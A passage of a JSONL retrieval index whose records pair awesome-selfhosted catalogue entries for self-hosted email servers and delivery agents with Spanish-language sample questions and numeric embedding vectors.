-0.0455, 0.02543, -0.01673, -0.0354, 0.05064, -0.02197, 0.05351, -0.00343, -0.00763, 0.10167, -0.02743, -0.00594, -0.01955, 0.08944, -0.06839, 0.03756, -0.03534, -0.01757, -0.01538, 0.0018, -0.02824, -0.0029, -0.01891, 0.01676, -0.02485, 0.05592, -0.00737, -0.03113, 0.04777, -0.03918, -0.02675, 0.01383, -0.0175, 0.03075, -0.02728, -0.03762, -0.06453, 0.02238, 0.07255, 0.0035, -0.08429, -0.02669, -0.07227, 0.00987, -0.01314, -0.04948, -0.04556, -0.00385, -0.04817, 0.0266, -0.02682, -0.0025, 0.01389]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "hay alguna alternativa libre a Postfix y Dovecot que sea todo en un solo daemon?", "v": [-0.09677, -0.00061, -0.24401, 0.10174, -0.08115, -0.0335, 0.0399, 0.01875, -0.09526, -0.06244, -0.0571, -0.17207, -0.16282, -0.15332, 0.07705, -0.07437, 0.14618, -0.01258, 0.02546, -0.07041, -0.01077, -0.03041, -0.10548, -0.00486, 0.12062, -0.0255, 0.04107, 0.07466, -0.09729, -0.04502, 0.1356, -0.06173, 0.05312, 0.02847, -0.1067, -0.06767, 0.0617, -0.10652, 0.12689, 0.04428, 0.08161, -0.13755, -0.12511, 0.12352, -0.03963, -0.0195, -0.10436, -0.00256, -0.03041, -0.05143, -0.04293, -0.0385, 0.04264, -0.02402, 0.04115, 0.10064, 0.07445, -0.1052, 0.01747, -0.05372, -0.2159, 0.03105, -0.00595, -0.01978, 0.14009, 0.11423, -0.06314, -0.06246, -0.13915, 0.04267, 0.055, 0.03309, 0.06077, -0.04987, -0.00597, 0.02036, -0.0152, -0.07821, 0.05337, 0.04718, -0.00799, -0.07066, -0.0433, 0.0375, -0.05709, -0.03428, 0.00592, -0.01847, -0.06864, -0.04611, 0.1084, 0.08397, -0.02671, 0.03131, 0.05433, 0.00797, 0.01263, 0.10058, 0.02951, 0.07813, 0.06551, 0.08848, -0.06101, 0.06086, 0.06109, -0.03598, 0.00286, -0.01433, -0.00016, -0.07156, -0.00486, 0.01497, -0.01853, -0.11464, -0.02287, -0.09158, -0.03447, 0.02601, 0.03668, 0.07234, 0.00414, -0.03998, 0.03169, 0.1013, -0.01376, -0.01209, 0.0536, 0.06743, 0.04386, -0.04594, 0.01728, 0.00256, -0.07132, -0.07321, -0.07533, 0.05693, 0.11514, 0.01141, 0.03872, -0.04463, 0.0171, 0.11392, 0.00317, 0.01053, 0.03222, -0.00166, -0.04725, -0.07841, -0.04662, 0.00096, 0.01124, -0.0455, 0.05198, 0.06723, 0.00559, 0.01669, 0.02174, 0.01414, 0.02165, 0.02171, -0.05444, -0.05581, -0.05369, 0.05006, -0.03443, -0.00223, -0.05987, -0.05574, -0.03778, 0.03191, -0.01505, 0.14252, 0.02954, -0.04848, 0.04979, -0.06501, -0.03855, -0.13813, 0.03042, 0.02642, 0.05318, 0.01064, 0.0121, -0.05795, 0.00224, -0.04002, 0.01223, -0.01868, 0.02405, -0.02346, -0.01384, 0.01077, -0.0309, -0.02038, -0.0361, -0.00775, -0.0207, -0.06652, 0.02071, -0.02536, -0.04588, -0.05246, -0.05133, -0.0525, -0.00958, 0.037, -0.09059, 0.02383, -0.01247, 0.08341, 0.03589, -0.01414, 0.03434, -0.02588, -0.00835, -0.01642, 0.06597, 0.00137, -0.01575, 0.00463, 0.07357, 0.01401, 0.00628, 0.00854, -0.05663, 0.04474, 0.05681, -0.00591, 0.05526, 0.05973, -0.01418, 0.03255, -0.01674, -0.00756, -0.00394, -0.00414, 0.05863, 0.00511, -0.01741, -0.0347, -0.00323, 0.03129, -0.01723, -0.0719, -0.03032, -0.05597, -0.08766, 0.03645, -0.04494, -0.10203, -0.04219, -0.00225, 0.03053, 0.00986, 0.04673, 0.0258]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Maddy Mail Server β€” All-in-one mail server that implements SMTP (both MTA and MX) and IMAP. Replaces Postfix, Dovecot, OpenDKIM, OpenSPF, OpenDMARC with single daemon [GPL-3.0, Go]. Mail-in-a-Box β€” Turns any Ubuntu server into a fully functional mail server with one command [CC0-1.0, Shell]. Mailcow β€” Mail server suite based on Dovecot, Postfix and other open source software, that provides a modern Web UI for administration [GPL-3.0, Docker/PHP]. Mailu β€” Simple yet full-featured mail server as a set of Docker images [MIT, Docker/Python]. Modoboa β€” Mail hosting and management platform including a modern and simplified web user interface [ISC, Python]. Mox β€” Complete e-mail solution with IMAP4, SMTP, SPF, DKIM, DMARC, MTA-STS, DANE and DNSSEC, reputation-based and content-based junk filtering, Internationalization (IDNA), automatic TLS with ACME and Let's Encrypt, account autoconfiguration, and webmail [MIT, Go].", "indexar": "con quΓ© herramienta puedo montar un servicio de email con interfaz web moderna sin configurar cada componente manualmente?", "v": [0.11396, 0.17362, -0.19494, -0.201, -0.01448, -0.08828, -0.0528, -0.00201, -0.19701, -0.10794, -0.12104, -0.03478, 0.04153, -0.09513, 0.06814, 0.09483, 0.11738, -0.14334, -0.01855, -0.00203, -0.03604, -0.0384, -0.06648, -0.02662, -0.05543, 0.04245, 0.03787, -0.07499, -0.14033, -0.01514, 0.07386, 0.01465, 0.05626, 0.04219, -0.06245, -0.0301, 0.00472, 0.07794, -0.02146, -0.04814, 0.00268, -0.0013, -0.05122, 0.14197, 0.05956, 0.02504, 0.0154, -0.02523, -0.00937, 0.0522, -0.01726, -0.06104, -0.08431, 0.00858, -0.0293, -0.07408, 0.26243, -0.17138, 0.10514, -0.11432, -0.00182, 0.12627, -0.07263, 0.10658, 0.046, -0.01305, -0.08936, -0.09216, -0.06449, 0.05495, 0.03749, -0.0515, -0.06207, -0.04016, 0.01715, 0.05335, -0.00387, 0.04357, 0.12852, 0.05835, 0.06096, -0.04142, -0.05368, 0.01552, -0.08164, -0.05018, 0.05485, -0.10995, -0.01797, -0.0961, 0.11126, 0.03698, -0.00033, 0.01092, 0.03903, -0.06899, 0.06698, 0.03445, -0.00425, 0.00228, 0.06678, 0.02322, -0.07519, 0.15632, 0.02381, -0.02227, 0.03022, -0.01373, 0.00656, -0.03375, -0.02986, 0.02819, -0.00598, -0.01589, -0.04768, -0.03815, -0.02832, -0.03144, -0.01063, -0.07136, -0.01965, 0.01094, 0.01472, -0.01682, 0.00339, -0.02067, -0.00232, 0.1371, 0.00232, -0.02999, -0.0043, -0.11464, -0.04621, -0.06481, 0.02951, 0.05526, -0.06377, -0.06675, -0.01282, -0.07174, 0.05025, 0.03557, 0.01021, -0.09431, 0.05779, -0.00741, 0.02401, -0.09275, -0.08495, 0.01752, 0.00695, 0.04481, 0.02059, 0.06097, -0.06438, 0.00482, 0.00557, -0.0424, -0.0199, 0.06297, -0.04759, -0.0336, 0.01658, 0.08609, 0.00955, -0.09301, -0.06395, 0.05283, 0.05411, 0.05942, -0.00448, 0.01944, 0.02611, -0.03134, 0.01368, 0.03004, -0.00866, 0.0242, 0.03528, -0.02925, -0.01402, 0.00172, -0.00513, -0.00159, -0.09239, -0.01706, -0.00799, -0.02542, -0.02449, 0.00898, -0.02351, 0.07732, -0.01854, 0.02468, 0.07311, 0.00825, -0.07899, -0.04852, -0.03451, -0.02955, 0.00392, -0.00718, 0.04059, -0.06435, -0.00336, 0.10097, -0.0157, 0.04236, 0.01228, 0.05329, 0.0139, -0.05943, 0.05589, -0.05774, 0.00386, -0.00639, 0.04987, -0.01895, -0.00484, 0.01167, 0.01096, -0.03344, 0.0941, -0.03611, -0.01005, -0.01055, 0.02412, 0.0526, 0.06197, 0.02441, -0.06797, 0.00297, -0.0369, -0.00999, 0.04009, 0.01088, 0.07081, -0.04542, -0.08956, -0.00839, 0.05422, 0.08466, -0.01733, -0.0188, -0.05032, -0.05714, -0.09099, 0.01219, -0.00245, -0.0698, -0.06718, 0.02687, 0.00384, -0.01701, 0.01252, -0.04533]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "quΓ© servidor de correo completo puedo usar para mi sitio web?", "v": [-0.09449, 0.08412, -0.20614, -0.0544, -0.06134, -0.11041, 0.02129, -0.15612, -0.03073, -0.08136, -0.16179, -0.06981, 0.03911, -0.06401, 0.01443, -0.02629, 0.21542, -0.06704, 0.08984, -0.03212, 0.02849, -0.07268, -0.01431, -0.03931, -0.12889, 0.0307, 0.13693, -0.04406, -0.09125, -0.05715, 0.02507, -0.02011, 0.03232, 0.0382, 0.02374, -0.03636, 0.06036, 0.10086, -0.07082, -0.00875, 0.07183, -0.02452, -0.11102, 0.02924, -0.00809, 0.00095, 0.04464, -0.14183, -0.03252, -0.02326, -0.03891, -0.11522, -0.18231, -0.00067, -0.02211, 0.0585, 0.16707, -0.1847, 0.13894, -0.00896, -0.1331, 0.04618, -0.01127, 0.02274, -0.02961, -0.05169, -0.04373, 0.00881, -0.09252, -0.04577, -0.05049, 0.02047, 0.04542, -0.09556, 0.06734, 0.04559, -0.0071, -0.01994, 0.03884, 0.07025, 0.038, 0.03949, -0.06857, 0.08072, -0.1278, -0.05864, -0.00099, -0.06576, 0.07017, -0.04769, 0.10158, 0.05673, -0.09341, 0.02132, -0.05715, -0.12939, 0.01593, -0.01641, 0.00705, 0.00108, 0.0968, 0.04663, -0.01319, 0.06233, 0.04718, 0.07212, 0.07392, -0.0435, 0.02939, -0.05762, 0.03749, -0.06598, -0.13302, -0.03769, -0.08081, -0.03746, -0.00942, -0.02359, 0.03926, -0.01575, -0.06757, 0.05382, 0.02567, 0.02772, 0.03232, -0.04267, 0.07333, 0.02404, -0.05035, -0.03375, -0.06359, -0.05817, -0.09729, -0.04943, 0.05723, 0.02232, 0.04202, -0.03084, -0.01595, -0.00576, -0.00209, -0.0264, -0.10226, 0.01859, 0.08041, -0.01269, 0.02884, -0.07802, -0.12173, -0.02938, 0.00924, -0.01885, -0.02034, -0.01359, -0.07074, -0.03978, 0.03451, -0.07185, -0.00998, 0.00931, 0.00183, 0.06574, 0.06871, 0.0812, 0.01448, -0.00303, -0.03497, 0.04756, 0.00265, 0.07234, -0.00603, 0.08951, 0.01334, -0.09991, 0.03689, -0.0337, -0.07938, -0.00339, -0.00735, -0.01733, -0.01381, 0.0104, -0.05525, 0.01715, -0.07372, 0.01388, 0.061, -0.02667, -0.00455, 0.05406, -0.01629, 0.03519, -0.02496, 0.04435, 0.03984, -0.00208, -0.01952, -0.04424, -0.00222, -0.08598, -0.03999, -0.04786, -0.05211, -0.03434, -0.00581, -0.01392, -0.03255, -0.03129, -0.01863, 0.04415, 0.01213, -0.06445, 0.09535, -0.06278, -0.0445, -0.01083, 0.11667, -0.05697, -0.01086, -0.02526, 0.00891, 0.03219, -0.0325, 0.02107, 0.03896, 0.03807, 0.02314, -0.05332, 0.03242, 0.03743, -0.03916, 0.0478, -0.06778, -0.05496, 0.02757, -0.0412, 0.02037, -0.03974, -0.0804, -0.04784, 0.01131, 0.08057, -0.03263, -0.03068, -0.0088, -0.09281, -0.06891, -0.00364, -0.08264, -0.02905, -0.02295, -0.06249, 0.01474, -0.05836, 0.01773, 0.03968]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "tengo alternativas a Gmail que sean cΓ³digo abierto y me protejan la direcciΓ³n de email?", "v": [-0.06249, -0.04802, -0.04149, -0.07597, -0.02385, -0.17105, -0.05282, 0.06369, -0.05552, -0.14724, 0.03553, -0.07338, 0.06801, -0.05045, 0.13794, -0.03012, 0.18576, -0.02652, 0.02004, -0.02565, -0.07879, 0.09255, -0.03769, -0.17511, -0.01123, 0.05643, 0.00367, -0.04526, 0.06644, 0.03618, 0.09484, -0.1545, 0.01219, -0.07593, -0.12343, 0.16226, 0.08948, 0.04648, -0.03273, 0.06187, -0.0229, -0.03631, -0.07653, 0.09949, -0.11956, -0.09419, 0.07948, 0.09594, -0.0494, -0.02526, -0.2003, -0.03526, -0.05724, -0.0523, 0.017, 0.1011, 0.06596, -0.08907, -0.08583, -0.07961, 0.05002, 0.01447, 0.15108, 0.14182, -0.02292, -0.04822, 0.06618, -0.01724, -0.21646, 0.06199, 0.09938, -0.02499, -0.12799, -0.01011, -0.01314, -0.00457, 0.01396, -0.00131, -0.03482, 0.15995, 0.02463, -0.03222, 0.01808, -0.02253, -0.0824, -0.14432, 0.02641, -0.04571, -0.08908, -0.10087, 0.08761, 0.0381, -0.08435, 0.14639, -0.01329, -0.01067, -0.04341, -0.08801, -0.05764, 0.05262, 0.10922, -0.01488, -0.00885, 0.08537, 0.058, 0.02184, -0.02449, -0.07294, 0.1028, 0.06641, -0.05239, -0.05319, -0.03702, -0.05871, -0.08496, -0.08312, -0.02074, -0.11091, 0.01145, 0.02601, 0.02732, -0.02923, -0.09095, 0.07294, 0.03065, 0.00996, -0.02625, 0.04847, 0.00016, 0.00465, -0.09009, -0.0899, -0.03574, 0.00829, 0.01524, 0.06943, -0.06418, -0.00751, -0.00038, -0.00534, 0.03673, -0.00672, 0.09308, -0.02019, -0.00399, 0.03252, -0.00549, -0.05223, -0.12913, -0.04996, -0.02215, 0.00581, 0.00064, 0.04308, -0.05667, 0.07124, -0.03211, -0.07346, 0.01813, 0.05034, -0.07719, 0.00563, -0.01549, 0.08711, -0.01369, -0.04224, 0.0203, -0.03289, -0.04225, -0.00628, -0.00686, 0.01207, 0.01251, -0.05297, -0.03703, -0.05722, 0.07078, 0.02697, 0.01207, 0.01607, -0.00176, 0.04782, 0.01125, 0.02008, -0.05031, -0.05509, 0.00972, -0.03779, -0.00844, 0.02499, 0.00206, 0.04237, 0.03881, 0.01377, -0.06259, -0.02729, -0.03903, -0.0571, -0.08622, -0.02323, -0.0195, 0.02965, 0.0256, -0.00808, -0.0133, 0.02591, -0.06168, 0.01541, -0.05011, 0.00524, 0.01816, -0.0139, 0.03394, 0.01295, 0.01121, 0.0024, 0.01474, 0.0402, 0.05633, 0.00975, 0.00743, -0.00863, -0.00249, -0.05998, 0.00789, 0.02169, -0.03625, 0.032, -0.03218, 0.02557, 0.01096, 0.03591, -0.05046, 0.02025, 0.04488, 0.01246, 0.01275, -0.02136, -0.01377, -0.01975, -0.00514, 0.02402, -0.03277, 0.00656, -0.03034, 0.01632, -0.05576, 0.01663, -0.05427, -0.01065, -0.03607, -0.01952, -0.04448, -0.03249, 0.03611, -0.03506]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Complete Solutions", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Complete Solutions", "tema": "communication - email - complete solutions", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Complete Solutions: Postal β€” Complete and fully featured mail server for use by websites & web servers [MIT, Docker/Ruby]. Simple NixOS Mailserver β€” Complete mailserver solution leveraging the Nix Ecosystem [GPL-3.0, Nix]. SimpleLogin β€” Open source email alias solution to protect your email address. Comes with browser extensions and mobile apps [MIT, Docker/Python]. Stalwart Mail Server β€” All-in-one mail server with JMAP, IMAP4, and SMTP support and a wide range of modern features [AGPL-3.0, Rust/Docker]. wildduck β€” Scalable no-SPOF IMAP/POP3 mail server [EUPL-1.2, Nodejs/Docker].", "indexar": "cuΓ‘l es el mejor servidor de correo con soporte IMAP y SMTP moderno?", "v": [-0.0415, -0.04141, -0.15576, -0.14661, -0.07945, -0.13319, 0.00981, -0.11167, -0.09947, 0.11484, -0.09028, 0.12099, 0.26432, -0.07838, 0.00197, 0.10326, 0.11766, -0.09398, 0.0459, 0.02214, 0.14902, 0.03637, -0.05938, -0.11939, -0.01051, 0.08502, -0.03224, 0.00457, -0.10391, -0.09879, 0.04476, -0.06715, -0.06722, -0.02458, 0.01587, -0.1263, 0.09629, 0.08316, -0.14205, 0.06235, 0.04615, -0.12366, 0.03669, 0.05994, 0.09107, -0.00284, 0.06652, -0.0306, -0.01069, -0.00766, -0.1739, -0.02976, -0.03349, -0.05495, -0.16046, 0.04287, 0.08426, -0.09789, 0.11134, -0.08371, -0.07335, 0.10802, -0.05813, -0.03653, 0.01178, 0.00814, -0.07507, -0.06848, -0.08452, -0.0385, -0.06638, 0.04028, 0.10772, -0.00537, -0.04741, 0.09437, -0.00234, -0.00368, 0.03213, 0.1042, 0.08407, 0.04598, -0.08568, 0.05084, -0.06604, -0.03629, 0.02439, -0.03132, -0.01481, -0.0477, 0.06272, 0.04088, -0.03552, 0.09543, -0.02726, -0.06043, -0.01291, -0.0989, 0.00905, 0.09204, -0.00259, 0.02379, -0.11693, 0.04176, 0.02109, 0.04515, 0.13149, -0.05106, 0.05624, 0.00485, -0.06846, 0.03248, -0.03235, 0.01389, 0.00932, -0.08048, -0.02699, -0.01285, 0.02822, -0.0076, 0.02683, -0.02687, 0.0032, 0.04505, 0.02287, -0.04947, 0.07508, -0.00715, 0.0552, 0.02399, -0.06613, -0.03966, -0.06741, -0.06071, 0.04346, 0.05219, 0.00123, 0.00679, -0.01162, -0.03873, 0.02362, 0.04268, -0.026, -0.05229, 0.05959, -0.00146, 0.08634, -0.06467, -0.06827, 0.00473, 0.01721, 0.01536, -0.00189, -0.00695, -0.03143, -0.03117, 0.02627, -0.08677, -0.0252, 0.12203, 0.02802, -0.02313, -0.01671, 0.07945, -0.04392, -0.0171, -0.0311, 0.06696, 0.05965, 0.03469, 0.01534, 0.00035, -0.01337, 0.00575, -0.02813, -0.10416, 0.01188, 0.02461, 0.04676, 0.01423, -0.08457, 0.01634, 3e-05, 0.01513, -0.04923, -0.05413, 0.03189, 0.03264, 0.05681, -0.06054, 0.02106, 0.0406, 0.01319, 0.01179, -0.00155, -0.05642, -0.01371, -0.03393, -0.03525, -0.03482, -0.05788, -0.05458, -0.03098, -0.1142, -0.02939, 0.00993, -0.0473, 0.06012, 0.03426, 0.03791, 0.01304, -0.04366, 0.05443, -0.08222, -0.05823, -0.00712, 0.02961, 0.01732, 0.0373, -0.04648, -0.00774, -0.03561, -0.01183, -0.0114, -0.02713, 0.0085, 0.00163, -0.05483, 0.0816, -0.01538, -0.0228, 0.04742, -0.01967, -0.01099, 0.06119, 0.04823, 0.03094, -0.06368, -0.05928, -0.07454, 0.0241, 0.04586, -0.07129, -0.00766, -0.05082, -0.03914, -0.11058, 0.01667, -0.07303, -0.03777, -0.02985, -0.03469, 0.00378, -0.04012, 0.02385, -0.02432]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "que programa sirve para gestionar el correo y la agenda desde cualquier cliente", "v": [-0.12759, 0.09837, -0.08609, -0.20789, 0.03594, -0.10959, 0.02381, -0.00741, -0.12606, -0.13928, -0.06065, -0.1591, 0.09458, -0.06973, 0.03194, 0.02429, 0.11497, -0.11082, 0.10862, 0.07158, -0.00432, 0.12674, 0.04124, -0.05027, -0.14902, -0.02325, 0.17484, -0.11429, -0.01557, 0.04754, 0.06686, -0.14494, -0.00174, -0.14562, 0.13636, -0.00028, 0.01985, 0.03328, -0.07286, 0.01288, 0.02098, -0.00107, -0.04255, -0.00141, 0.13042, -0.00123, 0.1468, -0.00597, -0.04213, 0.03299, -0.08733, -0.08493, -0.08864, -0.01829, 0.06379, 0.0233, -0.04099, -0.21415, -0.01382, -0.0904, -0.02205, 0.04164, 0.03139, 0.06902, 0.02975, -0.03112, 0.12418, -0.02794, -0.05325, 0.01177, -0.10685, -0.03622, 0.03308, -0.01594, 0.039, -0.07907, 0.08401, 0.09834, -0.0458, -0.00311, 0.0211, -0.01162, -0.0658, 0.06305, -0.0801, -0.02296, 0.08952, -0.00576, -0.08477, 0.02249, 0.01178, 0.05612, -0.03716, 0.00154, 0.02541, 0.00047, 0.0612, -0.00899, 0.04185, 0.0816, 0.03569, -0.03795, -0.11279, 0.0855, -0.04612, 0.07133, 0.04845, -0.04083, -0.05543, 0.07, -0.10652, -0.01234, -0.01315, -0.01456, -0.06496, -0.03852, 0.0246, -0.00345, 0.069, -0.00659, -0.10653, 0.04188, -0.00363, 0.07445, 0.09242, -0.00529, 0.00464, 0.12527, -0.02387, 0.07682, -0.04982, 0.00701, -0.00722, -0.00558, -0.01607, -0.08554, -0.03762, -0.02834, -0.01337, -0.03569, -0.06638, 0.10643, -0.00374, 0.02451, 0.0824, -0.10274, 0.00254, -0.07416, 0.01459, 0.06159, 0.04772, -0.02846, 0.01123, 0.05218, -0.08035, -0.03587, -0.02095, -0.04714, -0.03313, 0.03708, -0.04028, 0.00911, 0.04918, 0.04762, 0.0976, -0.0474, -0.05236, 0.04014, 0.05197, 0.11987, -0.02478, 0.07257, 0.07072, -0.06042, 0.0098, -0.01889, 0.03158, -0.04889, 0.07364, 0.01553, -0.0622, 0.03311, 0.08058, 0.06485, -0.03539, -0.01737, -0.04829, 0.05948, -0.00254, 0.00886, -0.02417, 0.02937, -0.03149, -0.03344, -0.03689, -0.0301, -0.05589, -0.00935, -0.01851, -0.02409, -0.04484, -0.02819, 0.04982, 0.00708, 0.0078, 0.0976, -0.0159, 0.03793, 0.05949, 0.11662, 0.00353, -0.01318, 0.05814, 0.02419, -0.01825, -0.03821, -0.00447, 0.03564, 0.07485, 0.04547, -0.03073, -0.0421, 0.00726, 0.01363, -0.04974, -0.05173, 0.04815, 0.01688, 0.03612, -0.01826, 0.01336, 0.00762, 0.00816, 0.00312, 0.04579, -0.03298, 0.07196, -0.06306, 0.0009, -0.06715, -0.00467, 0.04701, 0.02941, -0.00644, -0.02178, 0.02038, -0.06574, 0.02848, -0.02064, -0.00426, -0.0418, 0.00027, 0.02264, 0.01883, 0.0347, 0.03555]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written primarily with security in mind [MIT/LGPL-2.1, C/deb].", "indexar": "cual es una alternativa libre a Exchange para conectar servidores de correo personalizados", "v": [-0.04316, 0.0991, -0.17464, -0.15686, -0.07162, -0.05224, 0.02533, -0.09223, -0.12157, -0.09603, -0.10511, -0.12259, 0.03972, -0.0694, 0.0891, -0.03777, 0.1474, -0.01023, 0.12821, 0.02578, 0.02264, 0.05471, -0.10564, -0.09242, -0.05898, 0.03422, 0.02624, -0.02632, -0.03517, 0.0656, 0.07567, -0.13293, 0.04125, 0.08178, 0.05299, -0.00233, 0.0685, 0.19047, 0.07326, -0.03307, 0.12472, -0.03797, -0.11982, 0.0518, 0.03581, -0.02811, 0.0327, -0.00252, 0.05904, 0.04479, -0.16944, -0.06656, -0.13419, -0.05146, -0.01398, 0.0063, 0.13715, -0.11657, -0.008, -0.00919, -0.10958, 0.08055, 0.05649, -0.04033, 0.02394, -0.02465, -0.08544, -0.06576, -0.14612, 0.04797, 0.04178, -0.02388, -0.02962, -0.0919, -0.05729, 0.11362, -0.01289, -0.07035, 0.01047, 0.1313, 0.06589, -0.05577, 0.0127, 0.05726, -0.0935, -0.05475, 0.01313, -0.04137, 0.03374, 0.03387, 0.08213, -0.00254, -0.05442, 0.09509, -0.03468, -0.08212, 0.02983, -0.06327, -0.03345, 0.09966, 0.13019, 0.10891, -0.10069, 0.07609, -0.048, -0.02289, 0.00749, 0.0568, 0.03137, 0.0225, 0.03807, -0.01398, 0.03735, 0.04086, 0.00182, -0.1212, -0.00512, -0.03876, 0.01099, 0.05674, -0.09057, -0.00515, 0.00651, -0.0271, 0.00203, -0.04158, 0.04624, 0.00804, -0.04284, 0.08835, 0.02571, -0.03047, -0.06994, -0.12897, -0.13205, -0.01047, 0.09234, -0.10299, -0.03284, -0.05333, -0.01658, -0.01532, -0.01023, -0.03449, 0.05883, -0.01561, 0.06625, -0.02353, -0.0612, -0.00514, -0.06501, -0.02831, -0.061, 0.05355, -0.08283, -0.03452, -0.02271, -0.01893, -0.05886, 0.09454, 0.03239, -0.00973, 0.01524, 0.06318, 0.0273, 0.00975, -0.02896, 0.02673, -0.01109, 0.05625, -0.04189, 0.05081, 0.06915, -0.05995, -0.00463, -0.03817, -0.06052, -0.05924, 0.07182, -0.00981, 0.00033, 0.05417, -0.06449, -0.07502, -0.05517, -0.04781, -0.00585, 0.01584, 0.02069, 0.055, -0.06513, -0.0111, -0.06812, -0.03713, 0.02822, -0.01581, 0.0052, -0.12631, -0.06305, 0.00967, -0.00273, -0.0257, -0.02011, -0.03126, -0.02524, -0.01958, -0.07501, 0.02714, 0.00761, 0.07159, 0.02761, 0.00242, 0.12574, -0.00226, -0.03686, 0.02703, 0.04152, -0.09013, 0.03266, 0.01215, 0.00491, 0.00098, 0.00568, -0.00039, -0.02613, 0.01287, -0.00168, -0.00213, -0.03631, 0.02001, 0.00367, 0.05011, -0.00376, 0.01849, 0.00887, 0.0083, -0.00308, -0.00961, -0.00817, -0.02813, 0.06031, 0.10081, -0.03517, 0.00666, -0.02133, -0.03747, -0.09275, -0.02288, -0.07249, -0.02064, 0.01089, 0.00445, 0.00909, 0.03873, 0.01681, -0.01069]} -{"tipo": "pregunta", "herramienta": "Communication - Email - Mail Delivery Agents", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Email - Mail Delivery Agents", "tema": "communication - email - mail delivery agents", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Email - Mail Delivery Agents: Cyrus IMAP β€” Email (IMAP/POP3), contacts and calendar server [BSD-3-Clause-Attribution, C]. DavMail β€” POP/IMAP/SMTP/Caldav/Carddav/LDAP exchange gateway allowing users to use any mail/calendar client with an Exchange server, even from the internet or behind a firewall through Outlook Web Access [⚠, GPL-2.0, Java]. Dovecot β€” IMAP and POP3 server written 